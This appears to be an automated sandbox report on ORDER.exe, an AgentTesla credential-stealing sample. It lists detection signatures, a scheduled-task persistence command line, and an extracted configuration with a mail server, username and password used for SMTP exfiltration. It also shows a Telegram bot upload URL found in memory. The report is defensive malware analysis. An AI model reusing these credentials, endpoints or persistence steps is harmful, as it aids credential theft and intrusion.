Loading ...

Play interactive tourEdit tour

Analysis Report ORDER.exe

Overview

General Information

Sample Name:ORDER.exe
Analysis ID:323803
MD5:47af288ac4776f74b6460c0af541c859
SHA1:fbe1cb1497f614494ea8ba10f4f26110203f06ae
SHA256:e75f2e899377c5313dd3cee3ed9d8ac7e84267656656c5b9eaaee23ec50b5ab8
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • ORDER.exe (PID: 4356 cmdline: 'C:\Users\user\Desktop\ORDER.exe' MD5: 47AF288AC4776F74B6460C0AF541C859)
    • schtasks.exe (PID: 5988 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ORDER.exe (PID: 4396 cmdline: {path} MD5: 47AF288AC4776F74B6460C0AF541C859)
  • kprUEGC.exe (PID: 6572 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 47AF288AC4776F74B6460C0AF541C859)
    • schtasks.exe (PID: 6648 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmpE76F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kprUEGC.exe (PID: 6764 cmdline: {path} MD5: 47AF288AC4776F74B6460C0AF541C859)
  • kprUEGC.exe (PID: 6928 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 47AF288AC4776F74B6460C0AF541C859)
    • schtasks.exe (PID: 5532 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp103F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kprUEGC.exe (PID: 4416 cmdline: {path} MD5: 47AF288AC4776F74B6460C0AF541C859)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "bd8LsJGQ5M", "URL: ": "http://5WnFQTEnuc.com", "To: ": "weavingacc1@vasudeva.in", "ByHost: ": "mail.vasudeva.in:587", "Password: ": "mX3Cmv5", "From: ": "weavingacc1@vasudeva.in"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000D.00000002.333784884.00000000029B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.ORDER.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              17.2.kprUEGC.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                22.2.kprUEGC.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Scheduled temp file as task from temp locationShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\ORDER.exe' , ParentImage: C:\Users\user\Desktop\ORDER.exe, ParentProcessId: 4356, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp', ProcessId: 5988

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: ORDER.exe.4396.3.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "bd8LsJGQ5M", "URL: ": "http://5WnFQTEnuc.com", "To: ": "weavingacc1@vasudeva.in", "ByHost: ": "mail.vasudeva.in:587", "Password: ": "mX3Cmv5", "From: ": "weavingacc1@vasudeva.in"}
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeReversingLabs: Detection: 72%
                  Source: C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exeReversingLabs: Detection: 72%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: ORDER.exeVirustotal: Detection: 70%Perma Link
                  Source: ORDER.exeReversingLabs: Detection: 72%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exeJoe Sandbox ML: detected
                  Machine Learning detection for sampleShow sources
                  Source: ORDER.exeJoe Sandbox ML: detected
                  Source: 3.2.ORDER.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 17.2.kprUEGC.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 22.2.kprUEGC.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 4x nop then jmp 0993A824h
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 4x nop then jmp 06ABA824h

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49728 -> 68.233.236.158:587
                  May check the online IP address of the machineShow sources
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficTCP traffic: 192.168.2.5:49728 -> 68.233.236.158:587
                  Source: Joe Sandbox ViewIP Address: 54.243.164.148 54.243.164.148
                  Source: Joe Sandbox ViewIP Address: 54.243.164.148 54.243.164.148
                  Source: Joe Sandbox ViewIP Address: 68.233.236.158 68.233.236.158
                  Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficTCP traffic: 192.168.2.5:49728 -> 68.233.236.158:587
                  Source: unknownDNS traffic detected: queries for: g.msn.com
                  Source: ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: ORDER.exe, 00000003.00000002.506730748.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://5WnFQTEnuc.com
                  Source: ORDER.exe, 00000003.00000003.464804013.0000000001424000.00000004.00000001.sdmpString found in binary or memory: http://5WnFQTEnuc.com1-5-21-3853321935-2125563209-4053062332-1002_Classes
                  Source: kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: http://RKhkfz.com
                  Source: ORDER.exe, 00000003.00000002.514426874.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: ORDER.exe, 00000003.00000002.514426874.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: ORDER.exe, 00000003.00000002.508225211.0000000003363000.00000004.00000001.sdmpString found in binary or memory: http://mail.vasudeva.in
                  Source: ORDER.exe, 00000003.00000002.514426874.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: ORDER.exe, 00000000.00000002.254397053.0000000003061000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.333784884.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.359485793.00000000029D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: ORDER.exe, 00000003.00000002.508225211.0000000003363000.00000004.00000001.sdmpString found in binary or memory: http://vasudeva.in
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: ORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coml1
                  Source: ORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
                  Source: ORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoD
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                  Source: ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                  Source: ORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                  Source: ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                  Source: ORDER.exe, 00000003.00000002.514426874.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: ORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: kprUEGC.exe, 0000000D.00000002.332685562.0000000000D08000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  System Summary:

                  barindex
                  Initial sample is a PE file and has a suspicious nameShow sources
                  Source: initial sampleStatic PE information: Filename: ORDER.exe
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0166C164
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0166E5A0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0166E5B0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09939A71
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09937ED2
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09938AF0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09935FA0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_09937F0D
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_0993413A
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_099383A3
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_055947A0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_05594710
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_05594730
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06366C68
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_063694F8
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06367538
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0636B0E8
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06366920
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06364D74
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0636F04C
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0675DFF0
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06756C68
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06751480
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06754338
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0675D440
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06756290
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06754330
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_011CC164
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_011CE5B0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 13_2_011CE5A0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_012747A0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_01273E4A
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_0127473A
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_0127D820
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_05E97538
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_05E994F8
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_05E96920
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 17_2_05E96C68
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_027EC164
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_027EE5B0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_027EE5A0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB7ED2
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB9A71
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB5FA0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB5F91
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB7F0D
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB8AF0
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB83A3
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeCode function: 18_2_06AB413A
                  Source: ORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXfhzKePuGoesTHRxzhWZClzMzrsKfKQYJFA.exe4 vs ORDER.exe
                  Source: ORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilename, vs ORDER.exe
                  Source: ORDER.exe, 00000000.00000002.261638170.000000000A0B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs ORDER.exe
                  Source: ORDER.exe, 00000000.00000002.261638170.000000000A0B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs ORDER.exe
                  Source: ORDER.exe, 00000000.00000002.255803526.000000000409A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs ORDER.exe
                  Source: ORDER.exe, 00000000.00000002.261453991.0000000009FB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs ORDER.exe
                  Source: ORDER.exe, 00000003.00000002.514591806.0000000006D40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs ORDER.exe
                  Source: ORDER.exe, 00000003.00000002.502850969.0000000000FC8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER.exe
                  Source: ORDER.exe, 00000003.00000000.252413820.0000000000E34000.00000002.00020000.sdmpBinary or memory string: OriginalFilename, vs ORDER.exe
                  Source: ORDER.exe, 00000003.00000002.514320127.0000000006930000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs ORDER.exe
                  Source: ORDER.exe, 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameXfhzKePuGoesTHRxzhWZClzMzrsKfKQYJFA.exe4 vs ORDER.exe
